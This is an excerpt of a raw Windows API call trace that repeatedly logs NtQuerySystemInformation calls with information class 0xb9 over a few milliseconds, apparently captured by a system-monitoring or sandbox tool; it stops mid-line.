[0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0274.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0274.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7c0, Length=0x20, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7c0, Length=0x20, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd28, Length=0x50, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0274.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0274.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x28, ResultLength=0x0) [0274.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x28, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation 